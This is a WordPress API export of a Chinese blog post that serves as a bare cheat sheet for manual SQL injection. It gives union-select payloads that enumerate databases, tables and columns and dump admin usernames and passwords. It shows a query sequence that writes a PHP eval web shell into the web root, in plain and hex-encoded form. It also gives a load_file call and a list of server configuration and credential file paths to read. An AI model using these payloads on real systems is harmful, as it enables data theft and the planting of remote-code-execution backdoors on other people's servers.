{"id":2037,"date":"2013-05-21T08:57:11","date_gmt":"2013-05-21T00:57:11","guid":{"rendered":"https:\/\/sdeno.com\/?p=2037"},"modified":"2013-05-21T09:21:21","modified_gmt":"2013-05-21T01:21:21","slug":"php%e6%89%8b%e5%b7%a5%e6%b3%a8%e5%85%a5%e5%9f%ba%e7%a1%80%e7%9f%a5%e8%af%86","status":"publish","type":"post","link":"https:\/\/sdeno.com\/?p=2037","title":{"rendered":"php\u624b\u5de5\u6ce8\u5165\u57fa\u7840\u77e5\u8bc6"},"content":{"rendered":"<p>order by<\/p>\n<p>[code]and 1=2 union select 1,user(),database() \u67e5\u8be2\u5f53\u524d\u7528\u6237\u540d \u5e93\u540d<br \/>\nunion select 1,group_concat(schema_name),3,4 from information_schema.schemata&#8211; \/\/\u5f53\u524d\u6240\u6709\u5e93\u540d[\/code]<\/p>\n<p>&nbsp;<br \/>\n[code]union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()&#8211; \u5f53\u524d\u5e93\u7684\u6240\u6709\u8868\u540d[\/code]<br \/>\n&nbsp;<br \/>\n[code]union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=\u5e93\u7684HEX&#8211; \u67e5\u8868\u540d[\/code]<br \/>\n&nbsp;<br \/>\n[code]union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=\u8868\u540d&#8211; \u67e5\u5b57\u6bb5[\/code]<\/p>\n<p>&nbsp;<br \/>\n[code]union select 1,concat_ws(0x3a,name,password),3,4 from admin&#8211;[\/code]<\/p>\n<p>&nbsp;<\/p>\n<p>[code]create table a (cmd text not null);<\/p>\n<p>insert into a (cmd) values(&#8216;&lt;?php eval($_post[cmd])?&gt;&#8217;);<\/p>\n<p>select cmd from a into outfile &#8216;d:\/www\/1.php&#8217;; \u6216\u8005select 0x3C3F706870206576616C28245F504F53545B636D645D293F3E into outfile&#8217;d:\/www\/1.php<\/p>\n<p>drop table if exists a;[\/code]<br \/>\nmanage\/Manage_backup.asp<br \/>\n[code]%20And%201=2%20union%20select%201,password,3,4,username%20from%20manage_user[\/code]<br \/>\n&nbsp;<br 
\/>\n[code]%20And%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44%20from%20admin[\/code]<\/p>\n<p>&nbsp;<\/p>\n<p>[code]load_file(0x2F7661722F7777772F68746D6C2F776562726F6F742F6F6666696365777777726F6F742F73656374696F6E73322E706870)[\/code]<br \/>\n&nbsp;<br \/>\n\u5e38\u7528\u7684\u4e00\u4e9b\u6587\u4ef6\u8def\u5f84\uff08load_file \u9700\u8981 FILE \u6743\u9650\uff0c\u5e76\u53d7 secure_file_priv \u9650\u5236\uff09\uff1a<br \/>\n\/usr\/local\/app\/apache2\/conf\/httpd.conf \/\/apache2\u7f3a\u7701\u914d\u7f6e\u6587\u4ef6<br \/>\n\/usr\/local\/apache2\/conf\/httpd.conf<br \/>\n\/usr\/local\/app\/apache2\/conf\/extra\/httpd-vhosts.conf \/\/\u865a\u62df\u7f51\u7ad9\u8bbe\u7f6e<br \/>\n\/usr\/local\/app\/php5\/lib\/php.ini \/\/PHP\u76f8\u5173\u8bbe\u7f6e<br \/>\n\/etc\/sysconfig\/iptables \/\/\u4ece\u4e2d\u5f97\u5230\u9632\u706b\u5899\u89c4\u5219\u7b56\u7565<br \/>\n\/etc\/httpd\/conf\/httpd.conf \/\/ apache\u914d\u7f6e\u6587\u4ef6<br \/>\n\/etc\/rsyncd.conf \/\/\u540c\u6b65\u7a0b\u5e8f\u914d\u7f6e\u6587\u4ef6<br \/>\n\/etc\/sysconfig\/network-scripts\/ifcfg-eth0 \/\/\u67e5\u770bIP.<br \/>\n\/etc\/my.cnf \/\/mysql\u7684\u914d\u7f6e\u6587\u4ef6<br \/>\n\/etc\/redhat-release \/\/\u7cfb\u7edf\u7248\u672c<br \/>\n\/etc\/issue<br \/>\n\/etc\/issue.net<br \/>\nc:\\mysql\\data\\mysql\\user.MYD \/\/\u5b58\u50a8\u4e86mysql.user\u8868\u4e2d\u7684\u6570\u636e\u5e93\u8fde\u63a5\u5bc6\u7801<br \/>\nc:\\Program Files\\RhinoSoft.com\\Serv-U\\ServUDaemon.ini \/\/\u5b58\u50a8\u4e86\u865a\u62df\u4e3b\u673a\u7f51\u7ad9\u8def\u5f84\u548c\u5bc6\u7801<br \/>\nc:\\Program Files\\Serv-U\\ServUDaemon.ini<br \/>\nc:\\windows\\my.ini \/\/MYSQL\u914d\u7f6e\u6587\u4ef6<br \/>\nc:\\windows\\system32\\inetsrv\\MetaBase.xml \/\/IIS\u914d\u7f6e\u6587\u4ef6<\/p>\n","protected":false},"excerpt":{"rendered":"<p>order by [code]and 1=2 union select 1,user(),database() 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"close","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,9],"tags":[],"class_list":["post-2037","post","type-post","status-publish","format-standard","hentry","category-php","category-9"],"_links":{"self":[{"href":"https:\/\/sdeno.com\/index.php?rest_route=\/wp\/v2\/posts\/2037","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sdeno.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sdeno.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sdeno.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sdeno.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2037"}],"version-history":[{"count":0,"href":"https:\/\/sdeno.com\/index.php?rest_route=\/wp\/v2\/posts\/2037\/revisions"}],"wp:attachment":[{"href":"https:\/\/sdeno.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2037"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sdeno.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2037"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sdeno.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2037"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}